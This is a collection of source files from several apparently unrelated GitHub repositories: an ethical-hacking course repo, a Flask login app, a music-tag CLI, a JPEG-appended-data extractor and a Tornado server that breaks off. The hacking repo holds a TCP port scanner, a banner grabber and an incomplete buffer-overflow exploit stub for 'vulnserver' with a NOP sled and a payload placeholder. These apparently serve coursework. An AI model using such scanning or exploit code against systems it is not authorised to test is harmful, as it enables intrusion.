"text": "import socket, subprocess, sys\nfrom datetime import datetime\n\nhostIP = socket.gethostbyname(sys.argv[1])\n\nstartTime = datetime.now()\t\t\t# Time the scan starts\n\n\n\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\nprint\"\"\nprint\" S C A N N I N G . . . \"\nprint\"\"\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\n\n\ntry:\n\t#Checks all ports in this range\n for scan_port in range(1,10000):\n\n\t\t#socket, protocol\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\t\tresult = s.connect_ex((hostIP, scan_port))\n\n\t\tif result == 0:\n print \"Port {}: \\t Open\".format(scan_port)\n s.close()\n\n#Error: Checks for address-related errors\nexcept socket.gaierror:\n print \"Couldn't find host\"\n sys.exit()\n\n#Error: Checks for socket-related errors\nexcept socket.error:\n print \"Couldn't connect to server\"\n sys.exit()\n\n#calculates the time for scan to complete\nendTime = datetime.now()\ntotalTime = endTime - startTime\n\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\nprint\" \"\nprint\" SCAN COMPLETED IN : *\", totalTime\nprint\" \"\nprint\"*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*_*\"\n"
},
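The scanner above checks 10,000 ports sequentially with no timeout, which is slow against filtered hosts; a threaded variant of the same connect_ex() check (a sketch, not from the repo) looks like:

```python
# Sketch: same check, parallelized; the timeout and worker count are arbitrary choices.
import socket
from concurrent.futures import ThreadPoolExecutor

def check(port, host="127.0.0.1"):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        if s.connect_ex((host, port)) == 0:
            print("Port {}: \t Open".format(port))

with ThreadPoolExecutor(max_workers=100) as pool:
    pool.map(check, range(1, 10000))
```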
{
"alpha_fraction": 0.621730387210846,
"alphanum_fraction": 0.6458752751350403,
"avg_line_length": 21.590909957885742,
"blob_id": "494f7aa72aad2eec6b7e6aa049a1e8ca52c8182f",
"content_id": "f53dedf89e5424f8155f52c19ba1bfe90ed81e12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 22,
"path": "/bannergrabber.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\n\ndef main():\n\taddress = sys.argv[1]\n\tport = int(sys.argv[2])\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.connect((address,port))\n\ts.send(\"Hello\")\n\tmessage = s.recv(4096)\n\tmyhexdump(message)\n\ndef myhexdump(src):\n\tlength = 16\n\tresult = []\n\tfor i in range(0,len(src),length):\n\t\tsubstring = src[i:i+length]\n\t\tresult.append(\"%04X \" % i)\n\t\thex = ''.join(\"%X\" % ord(c) for c in substring)\n\t\tresult.append(\"%-*s %s\\n\" % (length*3,hex,substring))\n\tprint b''.join(result)\n\nmain()\n"
},
{
"alpha_fraction": 0.6235294342041016,
"alphanum_fraction": 0.6509804129600525,
"avg_line_length": 17.214284896850586,
"blob_id": "77f76b2c1c13ea97f8d51c3a00fa48c35553e6cb",
"content_id": "97588bf132dfc98f9d4a5ecf375ad7b2c20f4a03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 14,
"path": "/bannerServer.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\n\ndef main():\n\tprint \"What message would you like to send?\"\n\tmsg = str(raw_input())\n\ts=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\ts.bind((\"0.0.0.0\",54))\n\ts.listen(5)\n\twhile True:\n\t\tc,addr = s.accept()\n\t\tc.send(msg)\n\t\tc.close()\n\nmain()\n"
},
{
"alpha_fraction": 0.6491228342056274,
"alphanum_fraction": 0.6710526347160339,
"avg_line_length": 34.07692337036133,
"blob_id": "9e63baa6bfe87e199fc4e22ad59d64f22ddd0607",
"content_id": "c7a4dacd6396b702c610a4bbe51bfe513180765b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 456,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 13,
"path": "/vulnserver_exploit.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "# VulnServer Exploit\n\nimport socket, sys\n\nip = sys.argv[1] # host IP\nport = int(sys.argv[2]) # Port of vulnerable application\ncmd = sys.argv[3] #\n\ngarbage = \"A\"*151 # garbage data to send\n\nnop_sled = \"\\x90\"*32 # assembly instruction that does nothing; can be overridden by payload if necessary\npayload = # use msfpayload to generate a payload depending on the exploit\nexploit = garbage + redir_inst + nop_sled + payload\n"
}
] | 6 |
imjenn/login-registration | https://github.com/imjenn/login-registration | 9ee62e945b06c21437595e37118107015875c5c2 | 131426e2e549efc0730114b1b1e24abf50de0604 | c97d64213ac280272b3919ce8b207b6ea6e34a4b | refs/heads/main | 2023-08-26T21:44:24.025279 | 2021-10-31T00:17:00 | 2021-10-31T00:17:00 | 423,017,501 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 20,
"blob_id": "56ba704b87aa31d9c1bd494c339a46235c5d43d4",
"content_id": "9b0dfde6c4bd36bf7e128c75f7a62acb6a4e1a16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "# login-registration\n"
},
{
"alpha_fraction": 0.573803722858429,
"alphanum_fraction": 0.5794809460639954,
"avg_line_length": 33.26388931274414,
"blob_id": "803edbec606c215f20dcb775600a61929b33360e",
"content_id": "06f3d6aed195e74d97656517199318f11b328d17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2466,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 72,
"path": "/flask_app/models/user.py",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "#import the function that will return an instance of a connection\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nimport re \n\n# regex object\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\nclass User:\n def __init__( self, data ):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email = data['email']\n self.password = data['password']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n # Class methods to query db\n\n # C - Create\n @classmethod\n def create(cls, data):\n query = \"INSERT INTO users (first_name, last_name, email, password) VALUES ( %(first_name)s, %(last_name)s, %(email)s, %(password)s);\"\n return connectToMySQL('login').query_db(query, data)\n\n # R - Read/Retrieve all\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM users;\"\n results = connectToMySQL('login').query_db(query)\n all_users = []\n for user in results:\n all_users.append(cls(user))\n return all_users\n\n @classmethod\n def get_by_email(cls,data):\n query = \"SELECT * FROM users WHERE email = %(email)s;\"\n results = connectToMySQL('login').query_db(query,data)\n if len(results) < 1:\n return False\n return cls(results[0])\n\n # R - Read/Retrieve one\n @classmethod\n def get_by_id(cls, data):\n query = \"SELECT * FROM users WHERE id=%(id)s;\"\n results = connectToMySQL('login').query_db(query, data)\n return cls(results[0])\n\n # Regex static method\n @staticmethod\n def is_valid(user):\n is_valid = True\n query = \"SELECT * FROM users WHERE email = %(email)s;\"\n results = connectToMySQL('login').query_db(query,user)\n if len(results) >= 1:\n flash(\"Email already taken.\")\n is_valid=False\n if not EMAIL_REGEX.match(user['email']):\n flash(\"Invalid Email\")\n is_valid=False\n if len(user['first_name']) < 3:\n flash(\"First name must be at least 3 characters\",\"register\")\n is_valid= False\n if len(user['last_name']) < 3:\n flash(\"Last name must be at least 3 characters\",\"register\")\n is_valid= False\n if user['pw1'] != user['pw2']:\n flash(\"Passwords do not match.\")\n return is_valid"
},
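The EMAIL_REGEX used by User.is_valid can be sanity-checked in isolation (pattern copied verbatim from the model above):

```python
import re

EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
print(bool(EMAIL_REGEX.match("[email protected]")))  # True
print(bool(EMAIL_REGEX.match("not-an-email")))        # False
```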
{
"alpha_fraction": 0.6179875135421753,
"alphanum_fraction": 0.62199467420578,
"avg_line_length": 27.80769157409668,
"blob_id": "f2436625aad105fea36cf4e2c1d37084a4508668",
"content_id": "f5cd2a0a0b9e0a941b9dbe6b874d318ea5aad8a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2246,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 78,
"path": "/flask_app/controllers/users.py",
"repo_name": "imjenn/login-registration",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, session, flash\nfrom flask_app import app\nfrom flask_app.models.user import User\nimport re\n\nfrom flask_bcrypt import Bcrypt\nbcrypt = Bcrypt(app)\n\nr_p = re.compile('^(?=\\S{6,20}$)(?=.*?\\d)(?=.*?[a-z])(?=.*?[A-Z])')\n\[email protected]('/')\ndef index():\n all_users = User.get_all()\n return render_template(\"index.html\", all_users=all_users)\n\n# Action route\[email protected]('/register', methods=['POST'])\ndef register():\n # Validate first\n user_dict = request.form.to_dict()\n if not User.is_valid(request.form):\n return redirect('/')\n\n if not r_p.match(user_dict['pw1']):\n flash(\"Password be at least 6 characters, include a digit number, and at least an uppercase and lowercase letter.\")\n return redirect('/')\n\n # Bcrypt\n pw_hash = bcrypt.generate_password_hash(request.form['pw1'])\n print(pw_hash)\n data = {\n \"first_name\": request.form['first_name'],\n \"last_name\": request.form['last_name'],\n \"email\": request.form['email'],\n \"password\": pw_hash\n }\n \n user_id = User.create(data)\n print(user_id)\n session['user_id'] = user_id\n return redirect(\"/dashboard\")\n\[email protected]('/login', methods=['POST'])\ndef login():\n user_in_db = User.get_by_email(request.form)\n\n # if user is not in db\n if not user_in_db:\n flash(\"Invalid email/password\")\n return redirect(\"/\")\n if not bcrypt.check_password_hash(user_in_db.password, request.form['password']):\n # If we get false after checking the pw\n flash(\"Invalid email/password\")\n return redirect(\"/\")\n # if pws matched, we set the user_id into session\n session['user_id'] = user_in_db.id\n return redirect(\"/dashboard\")\n\n# User page after successful login\[email protected]('/dashboard')\ndef display():\n if 'user_id' not in session:\n return redirect('/logout')\n data = {\n 'id' : session['user_id']\n }\n return render_template(\"dashboard.html\")\n\[email protected]('/logout')\ndef logout():\n session.clear()\n return redirect(\"/\")\n\n# If user enter in any other path\n# @app.route(\"/\", defaults=['path': ''])\n# @app.route('/<path:path>')\n# def catch_all(path):\n# return 'Error 404 page not found'"
}
] | 3 |
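register() stores a bcrypt hash and login() verifies it with check_password_hash; the round trip can be exercised standalone via flask_bcrypt's module-level helpers (a sketch; the sample password is arbitrary):

```python
from flask_bcrypt import generate_password_hash, check_password_hash

pw_hash = generate_password_hash("Secret1A")      # arbitrary sample password
print(check_password_hash(pw_hash, "Secret1A"))   # True
print(check_password_hash(pw_hash, "wrong"))      # False
```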
amirashabani/mo | https://github.com/amirashabani/mo | 0e8b88a7bb3bea559b76d92fe92747422ce799ad | 827e1ece4bcca48aa6685e659ae91d68a6a25e8a | 04658b991eb66f8f16a961bada86f614550971f7 | refs/heads/master | 2021-06-30T04:50:59.302155 | 2020-01-21T03:32:59 | 2020-01-21T03:32:59 | 229,165,932 | 0 | 0 | null | 2019-12-20T01:18:04 | 2020-01-21T03:38:59 | 2021-06-02T00:54:22 | Python | [
{
"alpha_fraction": 0.5206431746482849,
"alphanum_fraction": 0.5302042365074158,
"avg_line_length": 25.744186401367188,
"blob_id": "b75310d4a8a952e8345f94a09f4445e64e9f96e1",
"content_id": "ab1db9ccde47584820790f48dfd60edbe610736a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2301,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 86,
"path": "/mo.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "import sys, github\nfrom mutagen.easyid3 import EasyID3\nfrom colorama import Fore, Style, init\n\ndef latest(args):\n if len(args) == 1:\n print(\"Show latest what, exactly?\")\n exit(1)\n else:\n method = args[1]\n\n if method == \"version\":\n print(github.version())\n\ndef version(args):\n print(github.version())\n\ndef tags(args):\n if len(args) == 1:\n print(f\"Show {Fore.BLUE}{args[0]}{Style.RESET_ALL} for which audio, exactly?\")\n exit(1)\n else:\n method = args[0]\n filepath = args[1]\n\n try:\n audio = EasyID3(filepath)\n except Exception:\n print(\"I can't read that audio, are you sure you provided the path correctly?\")\n exit(1)\n\n if method == \"tags\":\n brief_statement = []\n brief_tags = [\"artist\", \"title\", \"album\", \"genre\", \"date\"]\n for tag in brief_tags:\n try:\n brief_statement.append(f\"{Fore.BLUE}{tag}:{Style.RESET_ALL} {audio[tag][0]}\")\n except Exception:\n brief_statement.append(f\"{Fore.BLUE}{tag}:{Fore.RED} can't find it.{Style.RESET_ALL}\")\n print('\\n'.join(brief_statement))\n else:\n try:\n print(audio[method][0])\n except Exception:\n print(f\"I can't find {Fore.BLUE}{method}{Style.RESET_ALL} from that audio.\")\n\ndef show(args):\n actions = {\n \"tags\": tags,\n \"artist\": tags,\n \"title\": tags,\n \"album\": tags,\n \"genre\": tags,\n \"date\": tags,\n \"version\": version,\n \"latest\": latest\n }\n if len(args) == 0:\n print(\"Show what, exactly?\")\n exit(1)\n else:\n action = args[0]\n if action in actions:\n actions[action](args)\n else:\n print(f\"I haven't been trained to show {Fore.RED}{action}{Style.RESET_ALL}.\")\n exit(1)\n\ndef main():\n init()\n args = sys.argv\n actions = {\n \"show\": show\n }\n if len(args) == 1:\n print(f\"{Fore.MAGENTA}MO, the Musicophile Owl!{Style.RESET_ALL}\")\n else:\n action = args[1]\n if action in actions:\n actions[action](args[2:])\n else:\n print(f\"I haven't been trained to {Fore.RED}{action}{Style.RESET_ALL}.\")\n exit(1)\n\nif __name__ == \"__main__\":\n main()\n\n"
},
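mo.py's `show tags` path boils down to reading EasyID3 frames from a file; the core of it as a standalone sketch (the file path is an example):

```python
from mutagen.easyid3 import EasyID3

audio = EasyID3("song.mp3")  # example path
for tag in ("artist", "title", "album", "genre", "date"):
    print(tag, ":", audio.get(tag, ["can't find it."])[0])
```

Invocation of the full script then looks like `python mo.py show tags song.mp3`, per the dispatch tables in main() and show().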
{
"alpha_fraction": 0.7766990065574646,
"alphanum_fraction": 0.8058252334594727,
"avg_line_length": 24.75,
"blob_id": "c523c2611e3b3fc8efa997e503202efd302e23f0",
"content_id": "cb0006e153718f29ff421c3824ebc80f5f8d420f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 4,
"path": "/misc/mutagen_generate_valid_keys.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "from pprint import pprint\nfrom mutagen.easyid3 import EasyID3\n\npprint(list(EasyID3.valid_keys.keys()))\n"
},
{
"alpha_fraction": 0.6722221970558167,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 24.64285659790039,
"blob_id": "4e13d4d5522b1e4e38a1485307ca20488994069f",
"content_id": "dbdbdd1654279822e817e8dd790242e2976cbfa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 14,
"path": "/github.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "import requests\nfrom dateutil import parser\n\ndef version():\n repository = \"https://api.github.com/repos/amirashabani/mo/commits/master\"\n\n response = requests.get(repository).json()\n\n last_commit = response[\"commit\"][\"author\"][\"date\"]\n\n # last_commit_parsed\n lcp = parser.parse(last_commit)\n\n return f\"{lcp.year}.{lcp.month:02}.{lcp.day:02}\"\n\n"
},
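version() turns the ISO-8601 date of the repo's latest commit into a calendar-style version string; for example (the date value here is illustrative):

```python
from dateutil import parser

lcp = parser.parse("2020-01-21T03:32:59Z")        # illustrative commit date
print(f"{lcp.year}.{lcp.month:02}.{lcp.day:02}")  # -> 2020.01.21
```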
{
"alpha_fraction": 0.48868778347969055,
"alphanum_fraction": 0.7104072570800781,
"avg_line_length": 16,
"blob_id": "f8489d23657903d325da9a001d2b3fa9750f177e",
"content_id": "9da9684401ccf0eaf8c1321dffe5d5b8fc8cfa77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "altgraph==0.16.1\nbeautifulsoup4==4.6.0\ncertifi==2019.11.28\nchardet==3.0.4\ncolorama==0.4.3\nidna==2.8\nlyricsgenius==1.8.2\nmutagen==1.43.0\nPyInstaller==3.6\npython-dateutil==2.8.1\nrequests==2.22.0\nsix==1.14.0\nurllib3==1.25.7\n"
},
{
"alpha_fraction": 0.7255717515945435,
"alphanum_fraction": 0.7422037124633789,
"avg_line_length": 21.904762268066406,
"blob_id": "020d10745c1fbc30c854ca28b3f2bb522f94afed",
"content_id": "7e4fdb98a21eb969186d2f9efa0b740cc13e5296",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 21,
"path": "/genius_lyrics.py",
"repo_name": "amirashabani/mo",
"src_encoding": "UTF-8",
"text": "from lyricsgenius import Genius\nfrom colorama import init, Fore, Style\nfrom mutagen.easyid3 import EasyID3\nfrom genius_tokens import CLIENT_ACCESS_TOKEN\nimport sys\n\nargs = sys.argv\n\nif len(args) == 1:\n print(\"Specify path to audio\")\n exit(1)\n\naudio_path = args[1]\naudio = EasyID3(audio_path)\n\ngenius = Genius(CLIENT_ACCESS_TOKEN)\ngenius.verbose = False\ngenius.remove_section_headers = True\nsong = genius.search_song(audio[\"title\"][0], audio[\"artist\"][0])\n\nprint(song.lyrics)\n"
}
] | 5 |
sour-barm/cellar_door-project | https://github.com/sour-barm/cellar_door-project | 503f4aa93f59938ce8320c85eaceaddfcbb8a064 | 9f6c7cdd8b0b8b9c251137cbc5023ab4831301d6 | 31f8ee003c35694972b94ede3a28681da381ec43 | refs/heads/master | 2022-11-10T23:09:16.893425 | 2018-09-29T19:35:23 | 2018-09-29T19:35:23 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5084299445152283,
"alphanum_fraction": 0.514488935470581,
"avg_line_length": 26.507246017456055,
"blob_id": "d85e839a209cb67f713ea69f83a8a6abe35328ab",
"content_id": "6e8d686c73183158c66912d2d5af2e4069a8e48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3796,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 138,
"path": "/cellar_door",
"repo_name": "sour-barm/cellar_door-project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport PIL.Image\nimport argparse\nimport os\nimport glob\nfrom sys import exit, argv\nfrom PIL.ExifTags import TAGS\n\nsupport = ['.jpg', '.jpeg', '.JPG', '.JPEG']\n__ver__ = 0.2\n__author__ = \"Plutonium\"\n__thanks__ = [ 'Dark Hole' ]\n\nstack = []\ndef get_metadata(img):\n if not os.access(img, os.R_OK):\n return False\n image = PIL.Image.open(img)\n data = image._getexif()\n ret = list()\n try:\n for key in data.keys():\n ret.append(key)\n ret.append(data[key])\n except AttributeError:\n ret = list()\n ret.append(image.size)\n ret.append(image.format)\n ret.append(image.mode)\n return ret\n\n#welcome to the rice fields, motherfucker\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file', required=False, help='file')\n parser.add_argument(\n '-d', '--dir', required=False, help='dir to search and research files')\n parser.add_argument('-i', '--info', required=False, default=False,\n action=\"store_true\", dest='info', help=\"info about programm\")\n args = parser.parse_args()\n if args.info != False:\n print(\"ver: \" + str(__ver__))\n print(\"author: \" + __author__)\n print(\"supported photo formats: \" + str(support))\n exit(0)\n if len(argv) < 2:\n print('[-]nothing to do!')\n exit(0)\n files = list()\n global stack\n if args.dir != None:\n if args.dir[:-1] != '/':\n args.dir += '/'\n i = 0\n while i < len(support):\n a = []\n a = glob.glob(args.dir + '*' + support[i])\n files += a\n b = 0\n while b <= len(a):\n stack.append(support[i])\n b = b + 1\n i = i + 1\n #add here another while if there are more types than in support\n else:\n ext = os.path.splitext(args.file)[1]\n files.append(args.file)\n stack.append(ext[:-4])\n return files, stack\n\ndef type_photo(files):\n try:\n data = get_metadata(files)\n except AttributeError:\n print('[-] error getting metadata at file:' + files)\n return\n if data == False:\n print('[-] error opening file:' + files)\n print(files)\n print('mode:' + str(data.pop()))\n print('format:' + str(data.pop()))\n print('resolution:' + str(data.pop()))\n if data == None or len(data) == 0:\n print('[-] no metadata in photo:' + files)\n else:\n print('[*] metadata:')\n try:\n while data != None:\n a = data.pop()\n tag = TAGS[data.pop()]\n print(tag + ' : ' + str(a))\n except:\n return\n return\n \n#I love the smell of napalm in the morning.\ndef is_rarjpeg(fil):\n f = open(fil, 'rb')\n buff = f.read()\n f.close()\n if (len(buff) - buff.find(b'\\xff\\xd9') - 2 == 0):\n return False\n else:\n return True\n\ndef get_rarjpeg(fil):\n f = open(fil, 'rb')\n buff = f.read()\n f.close()\n i = buff.find(b'\\xff\\xf9')\n w = open(fil + '.cellar_door', 'wb')\n w.write(buff[i + 2:])\n w.close()\n \n# Let's go. In and out. Twenty minute adventure \ndef main():\n file, stack = parse_args()\n i = 0\n s = 0\n stack.reverse()\n while s <= len(stack):\n file_type = stack.pop()\n type_photo(file[s])\n print('[*] all metadata have been printed')\n if is_rarjpeg(file[s]):\n print('[*] found rarjpeg!')\n get_rarjpeg(file[s])\n print('[+] done writing rarjpeg-dump. filename: ' + file[s] + '.cellar_door')\n else:\n print('[*] rarjpeg not found!')\n s = s + 1\n if s == len(file):\n break\n print('DONE')\n exit(0)\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
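The rarjpeg check above hinges on the JPEG End-Of-Image marker FF D9: anything after it is hidden payload. A test fixture can be produced by simple concatenation (paths and payload are examples):

```python
# Sketch: append bytes after a valid JPEG's FF D9 marker to create a test rarjpeg.
with open("cover.jpg", "rb") as f:
    cover = f.read()
with open("stego.jpg", "wb") as f:
    f.write(cover + b"hidden payload")
```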
Davidnln13/WORK-GS | https://github.com/Davidnln13/WORK-GS | 4dcf285a8ef7eb7ee47eae35aa18295a9281ec11 | 2aab008c840ed7afedbef9f9e18ec901b0755b84 | 9d2e1b0532cd61bea3deff58eaccaec80cad86e5 | refs/heads/master | 2020-03-18T19:57:21.964845 | 2018-06-19T13:51:53 | 2018-06-19T13:51:53 | 135,187,522 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5865272879600525,
"alphanum_fraction": 0.5981416702270508,
"avg_line_length": 18.56818199157715,
"blob_id": "1612c4f81d9b2d805dd18fa6b18e952234220898",
"content_id": "74be45496a56a8b7f12b9a38596f7cc5fd12cfba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 861,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 44,
"path": "/tests/test_signup.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..\\py')\n#sys.path.insert(0, '/C:/Users/C00178537/Desktop/Desktop/Paid Projects/Project Organiser/py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignup(unittest.TestCase):\n \"\"\"Test for Signup.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n\n def test_signup(self):\n \"\"\".\"\"\"\n print(\"test_signup\")\n self.assertTrue(is_prime(5))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6792529225349426,
"alphanum_fraction": 0.6864257454872131,
"avg_line_length": 25.483871459960938,
"blob_id": "f9b440e4bb1b831e9dd9cb0d8811aed8dd7291c8",
"content_id": "458631ea00a2b7d35c7f692e96ca0992f58d8c9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7389,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 279,
"path": "/py/server.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import tornado\nimport json\n\nfrom user_manager import UserManager\nfrom assignments_manager import AssignmentsManager\nimport planner\n\n\nfrom tornado import websocket, web, ioloop, httpserver\nfrom tornado import autoreload\nfrom tornado.ioloop import PeriodicCallback\n\n#A dictionary, key = ip:port, value = websocket associated with the ip\n#(techincally the websockethandler associated with the ip, but it's easier\n#to imagine as just the websocket.)\nconnections={}\n\ndef globalDaemonMethod():\n\tupdate_clients = planner.update()\n\t#print (\"Okay - Do we update =\", update_clients)\n\tif update_clients == True:\n\t\tfor k, item in connections.items():\n\t\t\titem[\"socket\"].get_assignments()\n\t\t\tif item[\"user_data\"][\"role\"] == \"teacher\":\n\t\t\t\titem[\"socket\"].get_all_submissions()\n\t\t\telse:\n\t\t\t\titem[\"socket\"].get_submissions(item[\"user_data\"][\"id\"])\n\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\t#This can be used to restrict which ip addresses can connect to the server\n\t#return True means any machine can connect\n\tdef check_origin(self, origin):\n\t\treturn True\n\n\tdef open(self):\n\t\tpass\n\t\tprint (\"WebSocket opened\")\n\n\n\tdef on_message(self, message):\n\t\t#convert message into a dictionary\n\t\tmessage = json.loads(message)\n\t\tmessage_type = message[\"type\"]\n\t\tmessage_data = message[\"data\"]\n\n\t\tif message_type == \"signup\":\n\t\t\tself.signup(message_data)\n\n\t\telif message_type == \"signin\":\n\t\t\tprint(\"in server.py\")\n\t\t\tself.signin(message_data)\n\n\t\telif message_type == \"add_assignment\":\n\t\t\tself.add_assignment(message_data)\n\n\t\telif message_type == \"get_assignments\":\n\t\t\tself.get_assignments()\n\n\t\telif message_type == \"delete_assignment\":\n\t\t\tself.delete_assignment(message_data[\"id\"])\n\n\t\telif message_type == \"submit_assignment\":\n\t\t\tself.submit_assignment(message_data)\n\n\t\telif message_type == \"get_submissions\":\n\t\t\tself.get_submissions(message_data[\"user_id\"])\n\n\t\telif message_type == \"get_all_submissions\":\n\t\t\tself.get_all_submissions()\n\n\t\telif message_type == \"submit_review\":\n\t\t\tself.submit_review(message_data)\n\n\t\telif message_type == \"push_standard\":\n\t\t\tself.push_standard(message_data)\n\n\t\telif message_type == \"get_standard\":\n\t\t\tself.get_standard()\n\n\t\telif message_type == \"update_table\":\n\t\t\tself.update_table(message_data)\n\n\n\n\tdef signup(self, message_data):\n\t\tmessage= user_manager.signup(message_data)\n\t\tself.send_message(message[0], message[1])\n\n\t\tif message[0] ==\"signup_successful\":\n\t\t\t#Save connection in there.\n\t\t\tip_address = \"\"\n\n\t\t\t# Get IP and Port from connection context if possible\n\t\t\taddress = self.request.connection.context.address\n\t\t\tif address:\n\t\t\t\tip = address[0]\n\t\t\t\tport = str(address[1])\n\t\t\t\tip_address = ip + \":\" + port\n\n\t\t\t# Original method\n\t\t\telse:\n\t\t\t\tip = self.request.remote_ip\n\t\t\t\tport = self.request.stream.socket.getpeername()[1]\n\t\t\t\tip_address = ip + \":\" + str(port)\n\n\t\t\tprint(\"signup successful\", ip_address)\n\t\t\tmessage[1][\"users\"] = {}\n\n\t\t\tconnection = {}\n\t\t\tconnection[\"ip\"] = ip_address\n\t\t\tconnection[\"socket\"] = self\n\t\t\tconnection[\"user_data\"] = message[1]\n\n\t\t\tconnections[message[1][\"email\"]] = \tconnection\n\n\t\t\tprint(\"Connections\", connections)\n\n\tdef update_table(self, message_data):\n\t\tmessage= 
user_manager.update_table(message_data)\n\t\tself.send_message(message[0], message[1]) \n\n\n\tdef signin(self, message_data):\n\t\tmessage = user_manager.signin(message_data)\n\t\tself.send_message(message[0], message[1])\n\n\t\tif message[0] ==\"signin_successful\":\n\t\t\t#Save connection in there.\n\t\t\tip_address = \"\"\n\n\t\t\t# Get IP and Port from connection context if possible\n\t\t\taddress = self.request.connection.context.address\n\t\t\tif address:\n\t\t\t\tip = address[0]\n\t\t\t\tport = str(address[1])\n\t\t\t\tip_address = ip + \":\" + port\n\n\t\t\t# Original method\n\t\t\telse:\n\t\t\t\tip = self.request.remote_ip\n\t\t\t\tport = self.request.stream.socket.getpeername()[1]\n\t\t\t\tip_address = ip + \":\" + str(port)\n\n\t\t\tmessage[1][\"users\"] = {}\n\n\t\t\tconnection = {}\n\t\t\tconnection[\"ip\"] = ip_address\n\t\t\tconnection[\"socket\"] = self\n\t\t\tconnection[\"user_data\"] = message[1]\n\n\t\t\tconnections[message[1][\"email\"]] = \tconnection\n\n\t\t\tprint(\"Connections\", connections)\n\n\tdef add_assignment(self, message_data):\n\t\tmessage = assignments_manager.add_assignment(message_data)\n\t\tself.send_message(message[0],{})\n\t\tfor k, item 